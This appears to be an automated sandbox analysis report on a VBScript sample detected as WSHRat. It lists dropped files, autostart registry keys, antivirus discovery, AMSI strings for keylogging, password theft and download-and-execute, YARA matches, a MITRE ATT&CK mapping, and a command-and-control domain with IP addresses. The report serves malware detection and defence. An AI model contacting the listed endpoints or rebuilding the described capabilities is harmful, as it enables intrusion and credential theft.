                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: wscript.exe, 00000003.00000002.2596806001.000001E9CD34B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1682858553.000001E9CD346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
                            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct

                            Stealing of Sensitive Information

                            Source: Yara match | File source: amsi64_8076.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_5872.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_480.amsi.csv, type: OTHER
                            Source: Yara match | File source: dump.pcap, type: PCAP
                            Source: Yara match | File source: 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596539768.000001F861CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1644848582.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000003.1564044312.000001F85FE1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640855197.000001B7E608A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1355744491.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000002.2596806001.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1682858553.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640525306.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000003.1558907071.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596948186.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000002.2597045534.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000002.2595876491.000001E9CB221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1356488425.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640874613.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1645277445.000001B7E5E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640631442.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000003.1564280890.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1645147466.000001B7E5D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 8076, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5872, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 480, type: MEMORYSTR

                            Remote Access Functionality

                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string up-n-exec
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string get-pass
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string down-n-exec
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string keylogger
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string take-log
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string up-n-exec
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string get-pass
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string down-n-exec
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string keylogger
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string take-log
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string up-n-exec
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string get-pass
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string down-n-exec
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string keylogger
                            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: Suspicious string take-log
                            Source: Yara match | File source: amsi64_8076.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_5872.amsi.csv, type: OTHER
                            Source: Yara match | File source: amsi64_480.amsi.csv, type: OTHER
                            Source: Yara match | File source: dump.pcap, type: PCAP
                            Source: Yara match | File source: 00000003.00000002.2596806001.000001E9CD392000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596539768.000001F861CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1356330407.000001E9CB43A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596539768.000001F861CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1644848582.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000003.1564044312.000001F85FE1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640855197.000001B7E608A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1355744491.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000002.2596806001.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1682858553.000001E9CD36D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640525306.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000003.1558907071.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596948186.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2596539768.000001F861C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000002.2597045534.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000002.2595876491.000001E9CB221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000003.00000003.1356488425.000001E9CD449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640874613.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.2595948700.000001F85FBE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1645277445.000001B7E5E20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1640631442.000001B7E7D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000003.1564280890.000001F861D89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000009.00000003.1645147466.000001B7E5D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 8076, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5872, type: MEMORYSTR
                            Source: Yara match | File source: Process Memory Space: wscript.exe PID: 480, type: MEMORYSTR

                            MITRE ATT&CK Matrix

                            Techniques are listed per tactic column; a bracketed number is the count marker the report attaches to a technique that was observed for this sample, techniques without a marker are the matrix baseline.

                            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                            Resource Development: Scripting [421]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                            Execution: Windows Management Instrumentation [11]; Exploitation for Client Execution [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                            Persistence: Scripting [421]; DLL Side-Loading [1]; Registry Run Keys / Startup Folder [121]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                            Privilege Escalation: DLL Side-Loading [1]; Process Injection [111]; Registry Run Keys / Startup Folder [121]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                            Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [4]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [131]; Process Injection [111]; Hidden Files and Directories [1]
                            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                            Discovery: File and Directory Discovery [2]; System Information Discovery [12]; Security Software Discovery [231]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; Remote System Discovery [1]; System Network Configuration Discovery [1]; System Owner/User Discovery; Network Sniffing
                            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                            Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                            Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Non-Standard Port [11]; Remote Access Software [1]; Non-Application Layer Protocol [3]; Application Layer Protocol [113]; Commonly Used Port; Application Layer Protocol; Web Protocols
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                            Behavior Graph

                            Behavior Graph ID: 1665235 | Sample: ORDER-25013-67789543AX.vbs | Startdate: 15/04/2025 | Architecture: WINDOWS | Score: 100

                            The graph is rendered below as a process tree; the number in brackets after a process is its node number in the graph.

                            Start (sample)
                              DNS: lee44.kozow.com
                              Signatures: Sigma detected: Register Wscript In Run Key; Suricata IDS alerts for network traffic; Found malware configuration; 17 other signatures
                              Started: wscript.exe [12]; wscript.exe [16]; wscript.exe [18]; wscript.exe [20]

                            wscript.exe [12]
                              Dropped: C:\Users\user\AppData\Local\Temp\rHMh.js, ASCII
                              Signatures: Benign windows process drops PE files; Detected WSHRat; VBScript performs obfuscated calls to suspicious functions; 3 other signatures
                              Started: wscript.exe [22]

                            wscript.exe [16]
                              Signatures: Wscript called in batch mode (surpress errors)
                              Started: wscript.exe [26]

                            wscript.exe [18]
                              Signatures: System process connects to network (likely due to code injection or exploit)

                            wscript.exe [22]
                              Network: 172.245.208.13, 49716, 80, AS-COLOCROSSINGUS, United States
                              Signatures: System process connects to network (likely due to code injection or exploit); Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Started: wscript.exe [28]

                            wscript.exe [28]
                              Dropped: C:\Users\user\AppData\Local\Temp\notepad.js, ASCII; C:\Users\user\AppData\Local\Temp\adobe.js, ASCII
                              Started: wscript.exe [31]; wscript.exe [34]

                            wscript.exe [31]
                              Dropped: C:\Users\user\AppData\Local\Temp\JaG.exe, PE32
                              Started: JaG.exe [38]

                            wscript.exe [34]
                              Network: lee44.kozow.com 104.168.7.12, 49717, 49718, 49725, AS-COLOCROSSINGUS, United States
                              Dropped: C:\Users\user\AppData\Roaming\...\adobe.js, ASCII
                              Signatures: Creates multiple autostart registry keys

                            JaG.exe [38]
                              Signatures: Multi AV Scanner detection for dropped file; Tries to delay execution (extensive OutputDebugStringW loop); Hides that the sample has been downloaded from the Internet (zone.identifier)
                              Started: cmd.exe [41]; cmd.exe [44]

                            cmd.exe [41]
                              Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                              Started: reg.exe [46]; PING.EXE [49]; conhost.exe [52]

                            cmd.exe [44]
                              Started: conhost.exe [54]; PING.EXE [56]

                            reg.exe [46]
                              Signatures: Creates multiple autostart registry keys

                            PING.EXE [49]
                              Network: 127.0.0.1 unknown unknown

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.